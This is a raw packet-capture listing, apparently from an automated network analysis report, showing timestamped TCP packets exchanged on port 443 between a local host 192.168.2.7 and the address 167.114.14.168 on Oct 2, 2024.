                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:42.747327089 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:42.747359037 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:42.747909069 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:42.747958899 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:42.748020887 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:42.748020887 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:42.748034000 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:42.748100042 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:42.748372078 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:42.748415947 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:42.748456955 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:42.748465061 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:42.748481989 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:42.748538017 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:42.749006987 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:42.749048948 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:42.749082088 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:42.749092102 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:42.749126911 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:42.749126911 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:42.759108067 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:42.759159088 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:42.759192944 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:42.759211063 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:42.759254932 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:42.759254932 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:42.759577990 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:42.759624004 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:42.759655952 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:42.759668112 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:42.759701967 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:42.759701967 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:42.836018085 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:42.836067915 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:42.836112022 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:42.836148977 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:42.836184025 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:42.836184025 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:42.836409092 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:42.836455107 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:42.836488962 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:42.836497068 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:42.836539984 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:42.836539984 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:42.837776899 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:42.837820053 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:42.837893009 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:42.837893009 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:42.837901115 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:42.837976933 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:42.838449955 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:42.838491917 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:42.838531017 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:42.838538885 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:42.838582993 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:42.838582993 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:42.838848114 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:42.838891983 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:42.838953018 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:42.838953018 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:42.838959932 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:42.839001894 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:42.839272022 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:42.839313984 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:42.839356899 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:42.839364052 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:42.839376926 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:42.839472055 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:42.840226889 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:42.840272903 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:42.840339899 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:42.840339899 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:42.840347052 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:42.840437889 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:42.844296932 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:42.844341040 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:42.844403028 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:42.844403028 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:42.844414949 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:42.844547987 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:42.936876059 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:42.936924934 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:42.937016010 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:42.937016010 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:42.937043905 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:42.937175035 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:42.938179970 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:42.938242912 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:42.938266993 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:42.938283920 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:42.938323975 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:42.938323975 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:42.939131975 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:42.939182043 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:42.939204931 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:42.939213037 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:42.939256907 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:42.939256907 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:42.940534115 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:42.940589905 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:42.940646887 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:42.940646887 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:42.940654039 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:42.940706968 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:42.940993071 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:42.941035986 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:42.941078901 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:42.941085100 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:42.941097021 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:42.941164970 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:42.941530943 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:42.941574097 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:42.941612005 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:42.941617966 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:42.941632986 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:42.941658020 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:42.942538023 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:42.942579985 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:42.942647934 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:42.942647934 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:42.942656040 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:42.942838907 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:42.949728012 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:42.949769020 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:42.949841022 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:42.949841022 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:42.949850082 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:42.949907064 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:43.027506113 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:43.027550936 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:43.027594090 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:43.027614117 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:43.027657032 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:43.027657032 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:43.028748989 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:43.028815985 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:43.028867006 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:43.028867006 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:43.028875113 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:43.028914928 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:43.029665947 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:43.029707909 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:43.029731989 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:43.029750109 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:43.029787064 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:43.029793978 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:43.031016111 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:43.031076908 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:43.031088114 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:43.031107903 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:43.031153917 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:43.031153917 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:43.031553984 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:43.031596899 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:43.031640053 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:43.031646013 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:43.031680107 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:43.031680107 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:43.032062054 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:43.032105923 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:43.032169104 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:43.032169104 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:43.032176018 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:43.032241106 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:43.033113003 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:43.033154964 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:43.033180952 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:43.033196926 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:43.033221960 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:43.033241987 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:43.040276051 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:43.040316105 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:43.040355921 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:43.040363073 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:43.040441990 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:43.118207932 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:43.118257046 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:43.118324995 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:43.118324995 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:43.118350983 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:43.118415117 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:43.119283915 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:43.119348049 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:43.119359970 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:43.119398117 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:43.119419098 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:43.119512081 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:43.120310068 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:43.120353937 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:43.120387077 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:43.120400906 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:43.120510101 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:43.120510101 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:43.121563911 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:43.121606112 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:43.121644974 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:43.121663094 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:43.121704102 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:43.121704102 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:43.122271061 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:43.122313023 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:43.122356892 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:43.122364998 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:43.122387886 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:43.122416019 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:43.122663975 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:43.122706890 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:43.122760057 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:43.122766972 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:43.122802019 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:43.122802019 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:43.124099970 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:43.124140978 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:43.124350071 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:43.124351025 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:43.124361038 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:43.124412060 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:43.130822897 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:43.130863905 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:43.130917072 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:43.130927086 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:43.130959988 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:43.130971909 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:43.209063053 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:43.209125042 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:43.209150076 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:43.209175110 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:43.209194899 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:43.209269047 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:43.209897995 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:43.209954977 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:43.210030079 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:43.210030079 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:43.210038900 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:43.210139990 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:43.211106062 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:43.211148977 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:43.211199999 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:43.211215019 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:43.211230040 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:43.211247921 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:43.212014914 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:43.212034941 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:43.212105036 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:43.212105036 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:43.212117910 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:43.212178946 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:43.212522030 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:43.212543011 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:43.212580919 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:43.212630033 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:43.212636948 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:43.212672949 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:43.213110924 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:43.213131905 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:43.213170052 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:43.213179111 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:43.213218927 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:43.213218927 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:43.214528084 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:43.214548111 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:43.214585066 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:43.214607000 CEST44349713167.114.14.168192.168.2.7
